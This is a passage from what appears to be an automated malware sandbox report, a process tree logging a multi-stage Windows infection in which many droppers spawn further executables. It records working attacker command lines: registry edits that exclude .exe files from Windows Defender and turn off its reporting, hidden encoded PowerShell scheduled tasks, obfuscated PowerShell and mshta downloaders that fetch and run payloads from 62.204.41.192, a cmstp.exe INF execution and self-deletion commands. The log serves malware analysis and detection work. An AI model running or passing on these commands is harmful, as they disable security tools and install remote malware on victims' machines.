C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
10⤵
- Creates scheduled task(s)
PID:400

C:\Users\Admin\Documents\mtFlXWwwUgwtYQTc6VkN4BVs.exe
"C:\Users\Admin\Documents\mtFlXWwwUgwtYQTc6VkN4BVs.exe"
10⤵
PID:1092

C:\Users\Admin\Pictures\Adobe Films\nHohA1aDcJNf8FeZf6wpnz7M.exe
"C:\Users\Admin\Pictures\Adobe Films\nHohA1aDcJNf8FeZf6wpnz7M.exe"
11⤵
PID:1852

C:\Users\Admin\Pictures\Adobe Films\EFhSNuZlVZuKxDW7zVSsm5JZ.exe
"C:\Users\Admin\Pictures\Adobe Films\EFhSNuZlVZuKxDW7zVSsm5JZ.exe"
11⤵
PID:4424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 616
12⤵
- Program crash
PID:6136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 624
12⤵
- Program crash
PID:1740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 656
12⤵
- Program crash
PID:4876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 788
12⤵
- Program crash
PID:6808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 788
12⤵
- Program crash
PID:6336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 752
12⤵
- Program crash
PID:4360

C:\Users\Admin\Pictures\Adobe Films\YKFVkZ1QkLSfsytHJrxSb62q.exe
"C:\Users\Admin\Pictures\Adobe Films\YKFVkZ1QkLSfsytHJrxSb62q.exe"
11⤵
PID:5808

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
12⤵
PID:4244

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
13⤵
- Kills process with taskkill
PID:3852

C:\Users\Admin\Pictures\Adobe Films\4raxjSzCRcmEDmGuGa7gfYms.exe
"C:\Users\Admin\Pictures\Adobe Films\4raxjSzCRcmEDmGuGa7gfYms.exe"
11⤵
PID:1040

C:\Users\Admin\AppData\Local\Temp\is-I0NQQ.tmp\4raxjSzCRcmEDmGuGa7gfYms.tmp
"C:\Users\Admin\AppData\Local\Temp\is-I0NQQ.tmp\4raxjSzCRcmEDmGuGa7gfYms.tmp" /SL5="$20286,140518,56832,C:\Users\Admin\Pictures\Adobe Films\4raxjSzCRcmEDmGuGa7gfYms.exe"
12⤵
PID:1152

C:\Users\Admin\AppData\Local\Temp\is-37VVE.tmp\RYUT55.exe
"C:\Users\Admin\AppData\Local\Temp\is-37VVE.tmp\RYUT55.exe" /S /UID=2709
13⤵
PID:1760

C:\Windows\system32\fondue.exe
"C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll
14⤵
PID:4584

C:\Users\Admin\Pictures\Adobe Films\j3eivxRu35q_EKv8CaHcd4Vr.exe
"C:\Users\Admin\Pictures\Adobe Films\j3eivxRu35q_EKv8CaHcd4Vr.exe"
11⤵
PID:1100

C:\Users\Admin\AppData\Local\Temp\7zS9284.tmp\Install.exe
.\Install.exe
12⤵
PID:3460

C:\Users\Admin\AppData\Local\Temp\7zSA3E9.tmp\Install.exe
.\Install.exe /S /site_id "525403"
13⤵
PID:6128

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
14⤵
PID:3344

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
15⤵
PID:6320

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
16⤵
PID:6564

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
16⤵
PID:5540

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
14⤵
PID:6228

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
15⤵
PID:6512

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
16⤵
PID:6928

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
16⤵
PID:6304

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gwyDSiHkS" /SC once /ST 01:38:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
14⤵
- Creates scheduled task(s)
PID:6784

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gwyDSiHkS"
14⤵
PID:6640

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gwyDSiHkS"
14⤵
PID:6568

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 20:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\FUpXztw.exe\" j6 /site_id 525403 /S" /V1 /F
14⤵
- Creates scheduled task(s)
PID:6356

C:\Users\Admin\Pictures\Adobe Films\YTkUGWF_YhBAQuZMG986dAMu.exe
"C:\Users\Admin\Pictures\Adobe Films\YTkUGWF_YhBAQuZMG986dAMu.exe"
11⤵
PID:5428

C:\Users\Admin\Pictures\Adobe Films\BJZqAJbAY1ubMKc9XTUapDid.exe
"C:\Users\Admin\Pictures\Adobe Films\BJZqAJbAY1ubMKc9XTUapDid.exe"
11⤵
PID:5784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 876
12⤵
- Program crash
PID:624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 876
12⤵
- Program crash
PID:6448

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
12⤵
PID:3840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 972
12⤵
- Program crash
PID:6112

C:\Users\Admin\Pictures\Adobe Films\Hgh52alBHoU72NSF_cmUy_2c.exe
"C:\Users\Admin\Pictures\Adobe Films\Hgh52alBHoU72NSF_cmUy_2c.exe"
11⤵
PID:4788

C:\Users\Admin\AppData\Local\Temp\dengbing.exe
"C:\Users\Admin\AppData\Local\Temp\dengbing.exe"
12⤵
PID:5008

C:\Users\Admin\AppData\Local\Temp\SharkSoftSetup36667.exe
"C:\Users\Admin\AppData\Local\Temp\SharkSoftSetup36667.exe"
12⤵
PID:5604

C:\Users\Admin\AppData\Local\Temp\5e9408d2-7199-437c-b991-8226ab91108f.exe
"C:\Users\Admin\AppData\Local\Temp\5e9408d2-7199-437c-b991-8226ab91108f.exe"
13⤵
PID:6768

C:\Users\Admin\AppData\Local\Temp\lijh.exe
"C:\Users\Admin\AppData\Local\Temp\lijh.exe"
12⤵
PID:4692

C:\Users\Admin\AppData\Local\Temp\lijh.exe
"C:\Users\Admin\AppData\Local\Temp\lijh.exe" -h
13⤵
PID:3512

C:\Users\Admin\AppData\Local\Temp\inst100.exe
"C:\Users\Admin\AppData\Local\Temp\inst100.exe"
12⤵
PID:4920

C:\Users\Admin\AppData\Local\Temp\askinstall63.exe
"C:\Users\Admin\AppData\Local\Temp\askinstall63.exe"
12⤵
PID:3400

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
13⤵
PID:7004

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
14⤵
- Kills process with taskkill
PID:364

C:\Users\Admin\AppData\Local\Temp\md7_7dfj.exe
"C:\Users\Admin\AppData\Local\Temp\md7_7dfj.exe"
12⤵
PID:6364

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
12⤵
PID:6528

C:\Users\Admin\AppData\Local\Temp\is-MB695.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MB695.tmp\setup.tmp" /SL5="$802B4,2343741,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe"
13⤵
PID:6964

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
14⤵
PID:4860

C:\Users\Admin\AppData\Local\Temp\is-UTPFS.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UTPFS.tmp\setup.tmp" /SL5="$20384,2343741,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
15⤵
PID:3892

C:\Program Files (x86)\AtomTweaker\NDP472-KB4054531-Web.exe
"C:\Program Files (x86)\AtomTweaker\NDP472-KB4054531-Web.exe" /q /norestart
16⤵
PID:2372

C:\6ec9f4856d0902c27599df05e337b5\Setup.exe
C:\6ec9f4856d0902c27599df05e337b5\\Setup.exe /q /norestart /x86 /x64 /web
17⤵
PID:6612

C:\Users\Admin\AppData\Local\Temp\is-BRUDG.tmp\dllhostwin.exe
"C:\Users\Admin\AppData\Local\Temp\is-BRUDG.tmp\dllhostwin.exe" 81
16⤵
PID:6048

C:\Users\Admin\AppData\Local\Temp\siww1049.exe
"C:\Users\Admin\AppData\Local\Temp\siww1049.exe"
12⤵
PID:6760

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
PID:5880

C:\Users\Admin\AppData\Local\Temp\udontsay.exe
"C:\Users\Admin\AppData\Local\Temp\udontsay.exe"
12⤵
PID:7028

C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"
12⤵
PID:4760

C:\Users\Admin\AppData\Local\Temp\eEGHoPh9kDLFA\app872.exe
C:\Users\Admin\AppData\Local\Temp\eEGHoPh9kDLFA\app872.exe
13⤵
PID:5596

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe
"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe"
12⤵
PID:6596

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" .\V~BVJJVx.KV
13⤵
PID:3720

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\V~BVJJVx.KV
14⤵
PID:5576

C:\Users\Admin\AppData\Local\Temp\accid.exe
"C:\Users\Admin\AppData\Local\Temp\accid.exe"
12⤵
PID:4208

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
13⤵
PID:6192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6192 -s 968
14⤵
- Program crash
PID:6576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6192 -s 976
14⤵
- Program crash
PID:1772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6192 -s 976
14⤵
- Program crash
PID:3208

C:\Users\Admin\AppData\Local\Temp\ebook.exe
"C:\Users\Admin\AppData\Local\Temp\ebook.exe"
12⤵
PID:1416

C:\Users\Admin\AppData\Local\Temp\anytime1.exe
"C:\Users\Admin\AppData\Local\Temp\anytime1.exe"
12⤵
PID:4936

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4936 -s 1664
13⤵
- Program crash
PID:6780

C:\Users\Admin\AppData\Local\Temp\anytime2.exe
"C:\Users\Admin\AppData\Local\Temp\anytime2.exe"
12⤵
PID:6500

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 6500 -s 1668
13⤵
- Program crash
PID:6268

C:\Users\Admin\AppData\Local\Temp\anytime3.exe
"C:\Users\Admin\AppData\Local\Temp\anytime3.exe"
12⤵
PID:6000

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 6000 -s 1688
13⤵
- Program crash
PID:4508

C:\Users\Admin\AppData\Local\Temp\anytime4.exe
"C:\Users\Admin\AppData\Local\Temp\anytime4.exe"
12⤵
PID:6756

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe
"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"
12⤵
PID:6372

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 6372 -s 1696
13⤵
- Program crash
PID:6716

C:\Users\Admin\Pictures\Adobe Films\38HrZ6XaF2YSOglin5mnxLV3.exe
"C:\Users\Admin\Pictures\Adobe Films\38HrZ6XaF2YSOglin5mnxLV3.exe"
9⤵
PID:5016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 1872
10⤵
- Program crash
PID:6244

C:\Users\Admin\Pictures\Adobe Films\nKMxcE7ouJPwISUQ6cHfVC1k.exe
"C:\Users\Admin\Pictures\Adobe Films\nKMxcE7ouJPwISUQ6cHfVC1k.exe"
9⤵
PID:4716

C:\Users\Admin\Pictures\Adobe Films\hbbY1s46MsGyTU61dyFFHwIj.exe
"C:\Users\Admin\Pictures\Adobe Films\hbbY1s46MsGyTU61dyFFHwIj.exe"
9⤵
PID:860

C:\Users\Admin\Pictures\Adobe Films\ISLVyDrKSqerK5K0wYTzvc6k.exe
"C:\Users\Admin\Pictures\Adobe Films\ISLVyDrKSqerK5K0wYTzvc6k.exe"
9⤵
PID:4424

C:\Users\Admin\AppData\Local\Temp\64b12c53-960d-4393-9b8c-5e46a00930b2.exe
"C:\Users\Admin\AppData\Local\Temp\64b12c53-960d-4393-9b8c-5e46a00930b2.exe"
10⤵
PID:5704

C:\Users\Admin\Pictures\Adobe Films\AEfqhqmNhR3z1vW5OwCIwmXW.exe
"C:\Users\Admin\Pictures\Adobe Films\AEfqhqmNhR3z1vW5OwCIwmXW.exe"
9⤵
PID:3496

C:\Users\Admin\Pictures\Adobe Films\WPr4cZ4MeBgAaHdY1SNUNVHW.exe
"C:\Users\Admin\Pictures\Adobe Films\WPr4cZ4MeBgAaHdY1SNUNVHW.exe"
9⤵
PID:2588

C:\Users\Admin\Pictures\Adobe Films\s2UF2YYLYTaK_hstkUUGvZZR.exe
"C:\Users\Admin\Pictures\Adobe Films\s2UF2YYLYTaK_hstkUUGvZZR.exe"
9⤵
PID:4108

C:\Users\Admin\AppData\Local\Temp\7zS1A95.tmp\Install.exe
.\Install.exe
10⤵
PID:2848

C:\Users\Admin\AppData\Local\Temp\7zS4280.tmp\Install.exe
.\Install.exe /S /site_id "525403"
11⤵
PID:3228

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
12⤵
PID:2100

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
13⤵
PID:6088

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
14⤵
PID:6012

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
14⤵
PID:3004

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
12⤵
PID:4936

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
13⤵
PID:5608

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
14⤵
PID:4520

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gyapTxVrs" /SC once /ST 15:20:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
12⤵
- Creates scheduled task(s)
PID:4796

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gyapTxVrs"
12⤵
PID:1476

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gyapTxVrs"
12⤵
PID:6792

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 20:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\lKoUyJv.exe\" j6 /site_id 525403 /S" /V1 /F
12⤵
- Creates scheduled task(s)
PID:6952

C:\Users\Admin\Pictures\Adobe Films\_EZQqNtEDgJUaeONsaAXqO_K.exe
"C:\Users\Admin\Pictures\Adobe Films\_EZQqNtEDgJUaeONsaAXqO_K.exe"
9⤵
PID:1440

C:\Users\Admin\Pictures\Adobe Films\_EZQqNtEDgJUaeONsaAXqO_K.exe
"C:\Users\Admin\Pictures\Adobe Films\_EZQqNtEDgJUaeONsaAXqO_K.exe"
10⤵
PID:1780

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\22d825de-014b-4ea9-a226-b5ec8ecebad5" /deny *S-1-1-0:(OI)(CI)(DE,DC)
11⤵
- Modifies file permissions
PID:4588

C:\Users\Admin\Pictures\Adobe Films\_EZQqNtEDgJUaeONsaAXqO_K.exe
"C:\Users\Admin\Pictures\Adobe Films\_EZQqNtEDgJUaeONsaAXqO_K.exe" --Admin IsNotAutoStart IsNotTask
11⤵
PID:624

C:\Users\Admin\Pictures\Adobe Films\_EZQqNtEDgJUaeONsaAXqO_K.exe
"C:\Users\Admin\Pictures\Adobe Films\_EZQqNtEDgJUaeONsaAXqO_K.exe" --Admin IsNotAutoStart IsNotTask
12⤵
PID:5180

C:\Users\Admin\AppData\Local\61b61cc3-099c-40e2-ba44-5c9d511d14ba\build2.exe
"C:\Users\Admin\AppData\Local\61b61cc3-099c-40e2-ba44-5c9d511d14ba\build2.exe"
13⤵
PID:3396

C:\Users\Admin\AppData\Local\61b61cc3-099c-40e2-ba44-5c9d511d14ba\build2.exe
"C:\Users\Admin\AppData\Local\61b61cc3-099c-40e2-ba44-5c9d511d14ba\build2.exe"
14⤵
PID:6604

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\61b61cc3-099c-40e2-ba44-5c9d511d14ba\build2.exe" & del C:\ProgramData\*.dll & exit
15⤵
PID:6512

C:\Windows\SysWOW64\taskkill.exe
taskkill /im build2.exe /f
16⤵
- Kills process with taskkill
PID:3116

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
16⤵
- Delays execution with timeout.exe
PID:2336

C:\Users\Admin\Pictures\Adobe Films\gAsVLVkcNFOLqk7T9GpJ3hZL.exe
"C:\Users\Admin\Pictures\Adobe Films\gAsVLVkcNFOLqk7T9GpJ3hZL.exe"
9⤵
PID:3300

C:\Users\Admin\Pictures\Adobe Films\PL_R8z3b4IgqCYI2gxIqXEz7.exe
"C:\Users\Admin\Pictures\Adobe Films\PL_R8z3b4IgqCYI2gxIqXEz7.exe"
9⤵
PID:364

C:\Users\Admin\Pictures\Adobe Films\jqs5A8qEIXfgr3ZQBTeLkLVv.exe
"C:\Users\Admin\Pictures\Adobe Films\jqs5A8qEIXfgr3ZQBTeLkLVv.exe"
9⤵
PID:4816

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c mshta http://62.204.41.192/-A/AutoRun.oo
10⤵
PID:6004

C:\Windows\SysWOW64\mshta.exe
mshta http://62.204.41.192/-A/AutoRun.oo
11⤵
PID:5076

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $WW1='{~}(N{~}e{~}{~}w{~}-Ob{~}j{~}e';$WW2='c{~}{~}t{~} S{~}ys{~}{~}t{~}e';$WW3='m{~}.N{~}e{~}{~}t.{~}W{~}e{~}{~}b{~}C{~}li{~}e{~}n';$WW4='t{~}).{~}D{~}{~}o{~}wn{~}{~}lo{~}a';$WW5='d{~}Fi{~}{~}l{~}{~}e';$LL='(''h{~}tt{~}{~}p{~}:/{~}/{~}6{~}2.204.41.192/-LOD/LOD.exe'',''{~}C{~}:{~}\{~}Pr{~}ogramData\LOD.exe'');';$OK=($WW1,$WW2,$WW3,$WW4,$WW5,$LL -Join '');$OK=$OK.replace('{~}','');I`E`X $OK|I`E`X;
10⤵
PID:6136

C:\ProgramData\LOD.exe
"C:\ProgramData\LOD.exe"
10⤵
PID:1288

C:\ProgramData\LOD.exe
"C:\ProgramData\LOD.exe"
10⤵
PID:5288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{Jok}(N{Jok}{Jok}e{Jok}w-{Jok}Ob{Jok}{Jok}je{Jok}{Jok}c{Jok}t N{Jok}{Jok}e{Jok}t.W{Jok}e';$c4='b{Jok}{Jok}Cli{Jok}{Jok}en{Jok}{Jok}t{Jok}).Do{Jok}{Jok}wn{Jok}{Jok}l{Jok}o';$c3='a{Jok}dS{Jok}{Jok}t{Jok}ri{Jok}{Jok}n{Jok}g{Jok}(''h{Jok}tt{Jok}p:/{Jok}/62.204.41.192/-RED/RED.oo''){Jok}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{Jok}','');I`E`X $TC|I`E`X
10⤵
PID:3432

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $WW1='{~}(N{~}e{~}{~}w{~}-Ob{~}j{~}e';$WW2='c{~}{~}t{~} S{~}ys{~}{~}t{~}e';$WW3='m{~}.N{~}e{~}{~}t.{~}W{~}e{~}{~}b{~}C{~}li{~}e{~}n';$WW4='t{~}).{~}D{~}{~}o{~}wn{~}{~}lo{~}a';$WW5='d{~}Fi{~}{~}l{~}{~}e';$LL='(''h{~}tt{~}{~}p{~}:/{~}/{~}6{~}2.204.41.192/AMSI/ecco.exe'',''{~}C{~}:{~}\{~}Pr{~}ogramData\ecco.exe'');';$OK=($WW1,$WW2,$WW3,$WW4,$WW5,$LL -Join '');$OK=$OK.replace('{~}','');I`E`X $OK|I`E`X;
10⤵
PID:2336

C:\ProgramData\ecco.exe
"C:\ProgramData\ecco.exe"
10⤵
PID:6172

\??\c:\windows\SysWOW64\cmstp.exe
"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\lzud1nsc.inf
11⤵
PID:5896

C:\Users\Admin\Pictures\Adobe Films\y2UtmIc1AIrfurWblD26a9M2.exe
"C:\Users\Admin\Pictures\Adobe Films\y2UtmIc1AIrfurWblD26a9M2.exe"
9⤵
PID:5144

C:\Users\Admin\Pictures\Adobe Films\nQBESIeVKF3zc0qjehr0VWZg.exe
"C:\Users\Admin\Pictures\Adobe Films\nQBESIeVKF3zc0qjehr0VWZg.exe"
9⤵
PID:2056

C:\Users\Admin\Pictures\Adobe Films\QfDJGjhkfpybLMkQuDpMQHSQ.exe
"C:\Users\Admin\Pictures\Adobe Films\QfDJGjhkfpybLMkQuDpMQHSQ.exe"
9⤵
PID:2808

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
10⤵
PID:4752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2808 -s 888
10⤵
- Program crash
PID:3344

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
10⤵
PID:5952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2808 -s 1028
10⤵
- Program crash
PID:944

C:\Users\Admin\Pictures\Adobe Films\GfXGJstdl1Oz7SU_ad5wgb_U.exe
"C:\Users\Admin\Pictures\Adobe Films\GfXGJstdl1Oz7SU_ad5wgb_U.exe"
9⤵
PID:2136

C:\Users\Admin\AppData\Local\Temp\is-HSOLJ.tmp\GfXGJstdl1Oz7SU_ad5wgb_U.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HSOLJ.tmp\GfXGJstdl1Oz7SU_ad5wgb_U.tmp" /SL5="$C0046,140518,56832,C:\Users\Admin\Pictures\Adobe Films\GfXGJstdl1Oz7SU_ad5wgb_U.exe"
10⤵
PID:5684

C:\Users\Admin\AppData\Local\Temp\is-O9FFR.tmp\RYUT55.exe
"C:\Users\Admin\AppData\Local\Temp\is-O9FFR.tmp\RYUT55.exe" /S /UID=2709
11⤵
PID:3484

C:\Users\Admin\Pictures\Adobe Films\vbrDBhuD8zIobNLwD99JB_7s.exe
"C:\Users\Admin\Pictures\Adobe Films\vbrDBhuD8zIobNLwD99JB_7s.exe"
9⤵
PID:5384

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc YwBtAGQAIAAvAGMAIAB0AGkAbQBlAG8AdQB0ACAAMgAwAA==
10⤵
PID:4804

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout 20
11⤵
PID:5436

C:\Windows\SysWOW64\timeout.exe
timeout 20
12⤵
- Delays execution with timeout.exe
PID:2920

C:\Users\Admin\Pictures\Adobe Films\IL1wV30FpHGTYr9TPYi1XfFT.exe
"C:\Users\Admin\Pictures\Adobe Films\IL1wV30FpHGTYr9TPYi1XfFT.exe"
9⤵
PID:5300

C:\Users\Admin\Pictures\Adobe Films\tEHnSE0z2TFtIkXIko4uva0M.exe
"C:\Users\Admin\Pictures\Adobe Films\tEHnSE0z2TFtIkXIko4uva0M.exe"
9⤵
PID:1212

C:\Users\Admin\Pictures\Adobe Films\tEHnSE0z2TFtIkXIko4uva0M.exe
"C:\Users\Admin\Pictures\Adobe Films\tEHnSE0z2TFtIkXIko4uva0M.exe"
